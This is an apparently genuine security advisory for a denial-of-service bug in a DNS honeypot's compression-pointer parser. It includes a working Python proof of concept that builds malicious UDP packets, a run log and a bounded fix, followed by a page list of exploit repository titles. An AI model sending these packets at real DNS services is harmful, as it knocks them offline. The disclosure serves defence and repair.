## Summary `trapster.libs.dns.decode_labels()` decodes DNS names from attacker-supplied UDP packets and recurses **once per RFC 1035 compression pointer** with **no cycle detection and no depth bound**. A single unauthenticated UDP datagram sent to the DNS honeypot drives the function past CPython's recursion limit, raising `RecursionError`. That exception is not handled anywhere on the `datagram_received` path, so it escapes into the asyncio event loop's default exception handler, the per-packet proxy task is never created, and a low-rate flood produces sustained CPU burn and log flooding (denial of service of the DNS honeypot module). ## Severity Medium (CVSS:3.1 `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L`). Network-reachable, unauthenticated, single-packet, availability-only against the DNS honeypot listener. ## Affected component - File: `trapster/libs/dns.py`, function `decode_labels()` (called by `decode_question_section` → `decode_dns_message`). - Reached from: `trapster/modules/dns.py`, `DnsUdpProtocol.datagram_received()` → `dns.decode_dns_message(data)`, where `data` is the raw attacker UDP payload received by `DnsHoneypot` on its configured bind address/port. - Version tested: latest `main` at commit `23156739de23816657cbc4582ad32094ed1cab43`. ## Details `decode_labels` implements RFC 1035 §4.1.4 name compression: ```python def decode_labels(message, offset): labels = [] while True: length, = struct.unpack_from("!B", message, offset) if (length & 0xC0) == 0xC0: pointer, = struct.unpack_from("!H", message, offset) offset += 2 return labels + decode_labels(message, pointer & 0x3FFF), offset # <-- recurses per pointer ... ``` Each compression pointer triggers a fresh recursive call to `decode_labels`. There is: - **No cycle detection** — a pointer that targets its own offset recurses forever. - **No depth bound** — a chain of distinct forward pointers recurses once per pointer. Either shape exhausts the Python stack and raises `RecursionError`. `decode_dns_message` does not catch it, and in `DnsUdpProtocol.datagram_received` the call `dns.decode_dns_message(data)` is unguarded, so the exception propagates out of `datagram_received` into the event loop. Each hostile packet therefore aborts its own packet-handling/proxy task, and the loop's default exception handler logs a full traceback for every packet. This is the same class of bug fixed upstream in `python-zeroconf` (compression-pointer recursion), except this implementation additionally lacks the loop/cycle guard that zeroconf already had. ## Proof of Concept Real-deploy E2E. The actual `trapster.modules.dns.DnsHoneypot` server is started on a real UDP socket; hostile packets are sent from a separate real client socket over loopback. The event-loop exception handler records what escapes `datagram_received`. `e2e_poc.py`: ```python import asyncio, struct, socket, sys from trapster.modules.dns import DnsHoneypot from trapster.logger.base import BaseLogger HOST, PORT = "127.0.0.1", 15353 captured_loop_exceptions = [] def build_benign_query(qname=b"example.com"): header = struct.pack("!6H", 0x1234, 0x0100, 1, 0, 0, 0) labels = b"".join(struct.pack("!B", len(p)) + p for p in qname.split(b".")) + b"\x00" return header + labels + struct.pack("!2H", 1, 1) def build_self_pointer(): header = struct.pack("!6H", 0x1234, 0x0100, 1, 0, 0, 0) name = struct.pack("!H", 0xC000 | 12) # pointer to offset 12 == this name return header + name + struct.pack("!2H", 1, 1) def build_pointer_chain(depth=2000): header = struct.pack("!6H", 0x1234, 0x0100, 1, 0, 0, 0) name = struct.pack("!H", 0xC000 | 18) qtail = struct.pack("!2H", 1, 1) chain = bytearray() for i in range(depth): chain += struct.pack("!H", 0xC000 | (18 + 2 * (i + 1))) chain += b"\x00" return header + name + qtail + bytes(chain) def send_udp(payload, timeout=1.0): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.settimeout(timeout) s.sendto(payload, (HOST, PORT)) try: return s.recvfrom(4096)[0] except socket.timeout: return None finally: s.close() async def main(): loop = asyncio.get_running_loop() def handler(loopobj, context): exc = context.get("exception") captured_loop_exceptions.append((repr(exc), context.get("message"))) print(f"[loop-exception-handler] {type(exc).__name__ if exc else None}: {context.get('message')}") loop.set_exception_handler(handler) hp = DnsHoneypot(config={"port": PORT, "target_dns": "127.0.0.1"}, logger=BaseLogger(node_id="e2e"), bindaddr=HOST) await hp.start(); await asyncio.sleep(0.4) print(f"[deploy] DnsHoneypot listening on udp://{HOST}:{PORT}\n") print("=== NEGATIVE CONTROL: benign query example.com A ===") captured_loop_exceptions.clear(); send_udp(build_benign_query()); await asyncio.sleep(0.3) print(f" loop exceptions after benign packet: {len(captured_loop_exceptions)}") assert len(captured_loop_exceptions) == 0 print(" -> benign packet parsed cleanly, no exception\n") print("=== VECTOR A: single self-referential compression pointer (cycle) ===") captured_loop_exceptions.clear(); pkt = build_self_pointer() print(f" packet ({len(pkt)} bytes) name field = pointer 0xC00C -> offset 12 (itself)") send_udp(pkt); await asyncio.sleep(0.5) print(f" loop exceptions captured: {len(captured_loop_exceptions)}") for e in captured_loop_exceptions: print(f" {e}") assert any("RecursionError" in e[0] for e in captured_loop_exceptions) print(" -> RecursionError escaped datagram_received (DoS, no cycle guard)\n") print("=== VECTOR B: 2000 chained forward compression pointers (zeroconf shape) ===") captured_loop_exceptions.clear(); pkt = build_pointer_chain(2000) print(f" packet ({len(pkt)} bytes) = 2000-deep forward pointer chain") send_udp(pkt); await asyncio.sleep(0.5) print(f" loop exceptions captured: {len(captured_loop_exceptions)}") for e in captured_loop_exceptions: print(f" {e}") assert any("RecursionError" in e[0] for e in captured_loop_exceptions) print(" -> RecursionError escaped datagram_received (DoS, no depth bound)\n") await hp.stop(); print("ALL ASSERTIONS PASSED") if __name__ == "__main__": sys.setrecursionlimit(1000) asyncio.run(main()) ``` Verbatim run against the deployed honeypot at commit `23156739de23816657cbc4582ad32094ed1cab43`: ``` [deploy] DnsHoneypot listening on udp://127.0.0.1:15353 === NEGATIVE CONTROL: benign query example.com A === loop exceptions after benign packet: 0 -> benign packet parsed cleanly, no exception === VECTOR A: single self-referential compression pointer (cycle) === packet (18 bytes) name field = pointer 0xC00C -> offset 12 (itself) [loop-exception-handler] RecursionError: Exception in callback _SelectorDatagramTransport._read_ready() loop exceptions captured: 1 ("RecursionError('maximum recursion depth exceeded in comparison')", 'Exception in callback _SelectorDatagramTransport._read_ready()') -> RecursionError escaped datagram_received (DoS, no cycle guard) === VECTOR B: 2000 chained forward compression pointers (zeroconf shape) === packet (4019 bytes) = 2000-deep forward pointer chain [loop-exception-handler] RecursionError: Exception in callback _SelectorDatagramTransport._read_ready() loop exceptions captured: 1 ("RecursionError('maximum recursion depth exceeded in comparison')", 'Exception in callback _SelectorDatagramTransport._read_ready()') -> RecursionError escaped datagram_received (DoS, no depth bound) ALL ASSERTIONS PASSED ``` The negative control (a well-formed `example.com` A query) parses with zero exceptions, confirming the crash is specific to the malformed compression input. ## Impact Any host able to send UDP to the DNS honeypot's bind address/port (unauthenticated, no UI) can crash the per-packet handler with a single ~18-byte datagram. A low-rate flood (a few packets per second) keeps the event loop logging full tracebacks and burning CPU, degrading the DNS honeypot and its logging pipeline. Availability impact only; no memory disclosure or code execution. ## Suggested fix Make `decode_labels` iterative-bounded: require every compression pointer to point strictly backward to a not-yet-visited offset, which bounds both cycles and long forward chains in O(message length) with no recursion. (This mirrors `dnspython`'s `biggest_pointer` design and the zeroconf depth-bound fix.) Replace the bare `raise "unknown label encoding"` with a real exception, and consider wrapping `dns.decode_dns_message(data)` in `DnsUdpProtocol.datagram_received` in a try/except so a malformed packet is logged once rather than escaping to the loop handler. Verified fix (benign + legitimate backward-compression names still decode; both hostile vectors are bounded to `ValueError` with no recursion): ```python def decode_labels(message, offset): labels = [] return_offset = None max_allowed_pointer = len(message) while True: length, = struct.unpack_from("!B", message, offset) if (length & 0xC0) == 0xC0: pointer, = struct.unpack_from("!H", message, offset) if return_offset is None: return_offset = offset + 2 target = pointer & 0x3FFF if target >= max_allowed_pointer: raise ValueError("invalid DNS compression pointer") max_allowed_pointer = target offset = target continue if (length & 0xC0) != 0x00: raise ValueError("unknown label encoding") offset += 1 if length == 0: return labels, return_offset if return_offset is not None else offset labels.append(*struct.unpack_from("!%ds" % length, message, offset)) try: labels[-1] = labels[-1].decode() except UnicodeDecodeError: labels[-1] = str(labels[-1]) offset += length ``` A fix PR will be supplied from a temporary private fork during the embargo. ## Credit Discovered and reported by tonghuaroot.
PoC: CVE-2026-38192
pluck-CMS-4.7.20-code-injection-vulnerability
PoC: CVE-2026-62735
Windows HTTP.sys integer overflow -> nonpaged pool overflow LPE PoC (CVE-2026-62735): crash + full SYSTEM exploit; for authorized testing
PoC: CVE-2026-82329-JFrog-Artifactory-Auth-Bypass
CVE-2026-82329 — JFrog Artifactory (self-hosted) Auth Bypass
PoC: CVE-2026-65349
CVE-2026-65349 PoC — getattrlist OOB write in vfs_attr_pack_internal (iOS 26.6 / 23G71)
PoC: CVE-2026-65343
CVE-2026-65343 PoC — AppleKeyStore OOB read → KASLR defeat (iOS 26.6 / 23G71)
PoC: CVE-2026-65330
CVE-2026-65330 PoC — setxattr PAC bypass via fixed #0x307a diversifier (iOS 26.6 / 23G71)
PoC: CVE-2026-64788
CVE-2026-64788 PoC — IOGPUFamily Use-After-Free (iOS 26.6 / 23G71)
PoC: cve-2024-55591-poc
Educational implementation in Go for CVE-2024-55591 (Fortinet FortiOS Authentication Bypass). Designed for security research, vulnerability assessment, and understanding WebSocket-based auth bypass mechanisms.
PoC: cve-2026-82329-jfrog-artifactory
CVE-2026-82329 JFrog Artifactory unauthenticated auth-bypass: reproducible Docker lab + URL-parameter validator PoC + patch-diff analysis
PoC: CVE-2026-82592
D-Link DIR-825M formDiskFormat stack overflow + command injection RCE PoC (CVE-2026-82592); for authorized security testing
PoC: My-Exploits
Metasploit modules, Python PoCs and throwaway Docker labs for four platform CVEs: Keycloak (CVE-2026-18963), Apache NiFi (CVE-2026-39816), HashiCorp Vault (CVE-2026-5006), HashiCorp Nomad (CVE-2026-7474).
PoC: gha-lab-f894926966
Authorized security-research reproduction lab for CVE-2025-54415 (GHSA-g5hx-xv45-9whg): astronomer/dag-factory snapshot at 464c75a — pull_request_target head-SHA checkout executes attacker-controlled hatch scripts in base-repo context
PoC: gha-lab-6926364d94
Security research lab reproducing CVE-2025-53546 (GHSA-h87r-5w74-qfm4): pull_request_target arbitrary code execution in RSSNext/Folo's auto-fix lint workflow — authorized, isolated reproduction
PoC: CVE-2025-8518
CVE-2025-8518 - Draft or TODO
PoC: gha-lab-3b0a828a69
Security-research lab reproducing CVE-2025-53104 (GHSA-432r-9455-7f9x): command injection in discussion-to-slack.yml of gluestack/gluestack-ui
PoC: gha-lab-e8902eccd3
Security research lab: reproduction of CVE-2025-52467 (pgai pull_request_target workflow code execution / GITHUB_TOKEN exfiltration) — snapshot of timescale/pgai
PoC: tomcatfileread
CVE-2020-1938 (Ghostcat) Tomcat AJP file read/file include PoC with python3 port
PoC: CVE-Chamilo-LMS
CVE-2026-61578, CVE-2026-61582, CVE-2026-61583, CVE-2026-61584, CVE-2026-61585, CVE-2026-61587, CVE-2026-61600, CVE-2026-61601, CVE-2026-61602, CVE-2026-70647, CVE-2026-70648 - Draft or TODO
PoC: gha-lab-2f775f277c
Authorized lab reproduction of CVE-2025-47928 (spotipy-dev/spotipy pull_request_target secrets exfiltration) — snapshot at vulnerable commit 4f5759d
PoC: CVE-2026-31787
Linux kernel double free in Xen privcmd driver
PoC: gha-lab-fb6df3d456
Authorized security-research lab reproducing CVE-2025-46820 (GHSA-cwj7-6v67-2cm4): GITHUB_TOKEN persisted into publicly downloadable CI artifacts in phpgt/Dom. Snapshot of phpgt/Dom @ b73d7e8.
PoC: CVE-2026-20212
CVE-2026-20212 - Draft or TODO
PoC: CVE-2026-56718
AJCloud AJY IPC Firmware Path Traversal via jdbhttpd
PoC: psa-2026-00043-recovery
Recovery notes for proxmox advisory ID: PSA-2026-00043-1 (CVE-2023-54391)
PoC: gha-lab-ba8e0c4217
Authorized security-research lab: reproduction of CVE-2024-42370 / GHSA-4hq2-rpgc-r8r7 (env injection in docs-preview.yml) — snapshot of litestar-org/litestar@18d84d84
PoC: CVE-2026-65643-PoC-Toolkit
🧰 CVE-2026-65643 – cPanel Domain Parking RCE Toolkit (CVSS 8.7) | Red/Blue Team suite for unpatched cPanel & WHM 11.x (110,134,136,138). 2 tools: Full Exploit (reverse shell, webshell, persistence, root passwd, file R/W, mass scan, Tor), Blue Team PoC (detection, reporting, audit). w/Python. 🦾 Only Use Ethically, Stay Legal <3
PoC: CVE-2026-4813
PoC for CVE-2026-4813
PoC: cve-2026-75604
Research lab and exploit chain for CVE-2026-75604: path traversal in the Next.js incremental cache, to RCE on Windows.
PoC: CVE-2026-82329
CVE‑2026‑82329 is a critical authentication bypass in JFrog Artifactory (CVSS 9.8) allowing unauthenticated attackers to obtain full administrative privileges. Actively exploited in the wild. Affects self‑hosted versions before patches. PoC for authorized testing only.
PoC: CVE-2026-52810
CVE-2026-52810 - Draft or TODO
PoC: iOS26.6-CVE-2026-64788
CVE-2026-64788 PoC — IOGPUFamily Use-After-Free (iOS 26.6 / 23G71)
PoC: CVE-2026-80428
CVE-2026-80428 PoC
PoC: iOS26.6-CVE-2026-65343
CVE-2026-65343 PoC — AppleKeyStore OOB read → KASLR defeat (iOS 26.6 / 23G71)
PoC: CVE-2026-80428
CVE-2026-80428 PoC
PoC: gha-lab-b1fe4918c0
Authorized security-research lab: reproduction of CVE-2025-32958 (GHSA-8c7v-vccv-cx4q) — GITHUB_TOKEN leaked into workflow artifacts by Adept's remoteBuild.yml (snapshot of AdeptLanguage/Adept @ 6a64554)
PoC: CVE-2026-83548-SonicWall-SMA1000-Analysis
Vulnerability Analysis of CVE-2026-83548 affecting SonicWall SMA1000 security systems.
PoC: CVE-2024-21546
This repository contains security assessment tooling, detection templates, and an automated exploit toolkit for identifying and exploiting Unauthenticated Remote Code Execution (RCE) in applications utilizing the `UniSharp/laravel-filemanager` package (Versions `< 2.9.1`).
PoC: CVE-2026-78071
Stored XSS via Location Title in DPCalendar Free
PoC: CVE-2026-78070
SQL Injection via ORDER BY Shortcode in plg_content_dpcalendar — DPCalendar Free ≤ 10.11.2
PoC: CVE-2026-19949
CVE-2026-19949 - Draft or TODO
PoC: CVE-2026-59822
CVE-2026-59822 - Draft or TODO
PoC: struts2-tool
Struts2 S2-045/S2-046 CVE-2017-5638 detection & exploitation tool
PoC: gha-lab-becf103a54
Authorized security-research reproduction of CVE-2025-15617 (GHSA-6xqr-4q5g-xc7x): artipacked GITHUB_TOKEN leak in wazuh FIM Windows integration workflow artifacts
PoC: CVE-2025-9974
Proof of Concept code for the CVE-2025-9974 affecting Nokia Beacon routers.
PoC: tfo-connect-bypass
Bypassing connect()-based syscall rules using TCP Fast Open (CVE-2026-63828 PoC)
PoC: CVE-2026-38577-by-deepak-Anmol
CVE-2026-38577
PoC: gha-lab-23db52563c
Security-research lab: reproduction of CVE-2025-10894 (PR-title injection in GitHub Actions) — snapshot of nrwl/nx
PoC: CVE-2026-9335-keras-hdf5-externallink
CVE-2026-9335: KerasFileEditor and load_weights follow h5py ExternalLinks, disclosing arbitrary local HDF5 file contents in keras ≤ 3.14.0. Advisory + verified PoCs.
PoC: vsFTPd-2.3.4-Exploit
Python exploit for the vsFTPd 2.3.4 backdoor (CVE-2011-2523).
PoC: CVE-2026-73296
CVE-2026-73296
PoC: CVE-2026-19490
NetScaler ADC/Gateway SAML unsigned-assertion bypass via HTTP-Redirect binding (CTX696939) - root cause analysis + PoC
PoC: dast
CVE-2026-0828
PoC: SmarterMail-CVE-2026-24423-
Exploit for CVE-2026-24423 — a critical unauthenticated RCE in SmarterMail's ConnectToHub API. Affects all builds prior to 9511.
PoC: gha-lab-d9fd584b12
Authorized security-research lab reproducing CVE-2024-47179 (GHSL-2024-178): artifact-poisoning pwn-request chain in RSSHub docker-test workflows (snapshot at 574d053)
PoC: LAB1-metasploitable
Exploitation des vulnérabilités sur la version vsftpd 2.3.4 du service ftp (CVE-2011-2523)
PoC: CVE-2022-25765
CVE-2022-25765 | pdfkit v0.8.6 Python PoC
PoC: CVE-2026-7899
CVE-2026-7899 - Draft or TODO
PoC: gha-lab-6ab39df295
Controlled security-research lab reproducing CVE-2024-45798 (GHSA-h52q-xhg2-6jw8) in espressif/arduino-esp32 — poisoned-artifact pwn request via tests_results.yml workflow_run
PoC: CVE-2026-9586
CVE-2026-9586 - Draft or TODO
PoC: artifactory-CVE-2026-82329-poc.py
CVE-2026-82329 — JFrog Artifactory unauthenticated authentication bypass ("phantom join key" -> forged service admin token)
PoC: gha-lab-40e23db109
Security-research lab: controlled reproduction of CVE-2024-4254 (GHSA-fc78-c36r-cc59) — deploy-website.yml fork checkout/code execution in gradio-app/gradio @ d4c503a
PoC: root-s24-e1s
Galaxy S24 SM-S921B S921BXXSDCZB2 RAM-only KernelSU Next (CVE-2026-43499) + Root S24 app
PoC: CVE-2024-49138-SOC-Investigation
SOC investigation of CVE-2024-49138 exploitation involving brute-force activity, PowerShell execution, malicious payload analysis, privilege escalation, and incident response.
PoC: gha-lab-ee08e207a8
Authorized security-research lab reproducing CVE-2024-4253 (GHSA-r897-wrpm-h4vw): workflow_run command injection in gradio-app/gradio's test-functional.yml
PoC: CVE-2026-24061-Telnetd
CVE-2026-24061 GNU Inetutils Telnetd Authentication Bypass
PoC: Fortigate-SSL-VPN-Exploit-Kit
The FortiGate SSL-VPN pot of gold. CVE-2024-21762 and CVE-2023-27997. 79 working exploit clients. 53 hardware SKUs. 55 FortiOS builds.
PoC: CVE-2026-33017
CVE-2025-62593 — Ray Unauthenticated RCE Exploit is an unauthenticated remote code execution vulnerability in the Ray distributed AI compute engine.
PoC: CVE-2026-13753-poc
Poc of CVE-2026-13753
PoC: CVE-2026-82221
PoC for Unauthenticated Reflected Cross-Site Scripting (XSS) in RegistrationMagic WordPress Plugin
PoC: ActiveMQ-CVE-2023-46604
Exploit POC for Apache ActiveMQ CVE-2023-46604
PoC: gha-lab-0ba60e6456
Authorized security-research lab reproducing CVE-2024-39700 / GHSA-45gq-v5wm-82wg (JupyterLab extension-template update-integration-tests pwn request)
PoC: CVE-2026-36130
CVE-2026-36130
PoC: CVE-2026-31321
CVE-2026-31321
PoC: postgresql-cve-2026-14662
PostgreSQL の全文検索(tsvector/tsquery)に見つかった範囲外書き込み脆弱性 CVE-2026-14662 を、修正前(18.4)と修正後(18.6)を Docker で並べて動かして検証した記録と発表資料
PoC: CVE-2026-27472-and-CVE-2026-27474
PoC for CVE-2026-27472 and CVE-2026-27474
PoC: CVE-2026-27475
PoC for CVE-2026-27475
PoC: CVE-2026-18963
Unauthenticated account takeover via reset-credentials flow bypass
PoC: CVE-2026-0768
CVE-2026-0768 - Draft or TODO
PoC: CVE-2026-82329
CVE-2026-82329 - Draft or TODO
PoC: tomcat-line-check
CVE-2026-24880: does Apache's upgrade advice actually apply to your Tomcat? Detects the fix by class presence, not version comparison. Covers 7.0/8.0/8.5/9.0/10.0/10.1/11.0 lines.
PoC: tomcat85-check
CVE-2025-55752 CVE-2025-55754 CVE-2025-48988 CVE-2025-52520 CVE-2025-53506 CVE-2025-61795 CVE-2025-66614:Tomcat 8.5 已 EOL,终版 8.5.100。Apache 逐条声明「8.5 也受影响」的 2025 CVE 有 14 条,其中 10 条在 NVD 按 8.5.100 查不到。离线单 jar,读 conf/ 判断你到底中了哪几条。
PoC: log4j2-vuln-lab
CVE-2021-44228 (Log4Shell) 漏洞复现靶场 | SpringBoot + Log4j2 2.14.1 | 3 个攻击向量 PoC 验证
PoC: CVE-2021-3493-Exploit
It's a CVE-2021-3493 Exploit written in C
PoC: gha-lab-8e9316151c
Controlled security-research lab reproducing CVE-2024-1540 (GitHub Actions command injection in gradio-app/gradio deploy+test-visual.yml) — flattened snapshot of gradio-app/gradio @ f35f615e33a5dd90bfeb106b6f5dca689849fcef
PoC: gha-lab-6255f5fc33
Security-research lab reproducing CVE-2023-6572 (GHSA-gqvf-3hgp-5hxv): command injection in gradio-app/gradio's workflow_run handling of generate-changeset.yml
PoC: nextcloud-cve-2023-49792-research
A project analysis of CVE-2023-49792, inspired by a HackerOne report I have recently come across.
PoC: CVE-2026-30252
The ZenShare Suite application is vulnerable by a Reflected Cross-Site Scripting (XSS) vulnerability, affecting web application login and recovery password functionalities.
PoC: CVE-2026-30251
A reflected cross-site scripting (XSS) vulnerability in the login_newpwd.php endpoint of Interzen Consulting S.r.l ZenShare Suite v17.0 allows attackers to execute arbitrary Javascript in the context of the user's browser via a crafted URL injected into the codice_azienda parameter.
PoC: gha-lab-fb32aba4a3
Authorized lab reproduction of CVE-2023-26493 (GHSL-2023-027): command injection via github.head_ref in cocos-engine's <Web> Interface check pull_request_target workflow
PoC: CVE-2018-14667_Lab_POC
Demonstration of the expression language (EL) injection vulnerability CVE-2018-14667 using the photoalbum lab under Jboss application server
PoC: weakrng-sweep
Weak-RNG stream-sweep research (CVE-2026-71851 class): PRNG schemes x seeds -> BIP39 -> victim set membership
PoC: cve-2022-29117-assessment
CVE-2022-29117 (.NET Cookie-Handling DoS) Assessment, Understanding & Questions Framework
PoC: POC-CVE-2026-0073
Security research PoC for CVE-2026-0073: ADB authentication bypass verification
PoC: gha-lab-232af4821f
Security-research lab reproducing CVE-2021-4281 (GHSA-3796-3f93-cfvx): shell command injection via PR head-branch name in .github/workflows/combine-prs.yml (snapshot of BraveUX/for-the-badge @ 409c1fda). Do not use; authorized reproduction only.
PoC: CVE-2026-82222
GiveWP <= 4.16.7.1 Unauthenticated PHP Object Injection → RCE
PoC: CVE-2026-76569
Reflected XSS via search GET Parameter in Phoca Download
PoC: activemq-cve-lab
ActiveMQ CVE-2015-5254 模拟靶场 - 用于 CVE 测试评测和 SCA 扫描演示
PoC: ghostlock-x200-app
vivo X200 设备端一键 root App(Shizuku 授权 shell 域执行,CVE-2026-43499)
PoC: gha-lab-b9842b12c0
Authorized security-research lab reproducing CVE-2021-21423 (GHSA-gg2g-m5wc-vccq): projen rebuild-bot pwn request via issue_comment
PoC: gha-lab-e4a85583c3
Security-research lab reproducing CVE-2020-36762 (GHSA-h9gr-83jq-f3xc): bash command injection via github.event.comment.body in the comment workflow of ONSdigital/ras-collection-instrument
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Get alerted for CVEs like this
Register your stack and get notified within minutes when a matching CVE drops.
Start monitoring free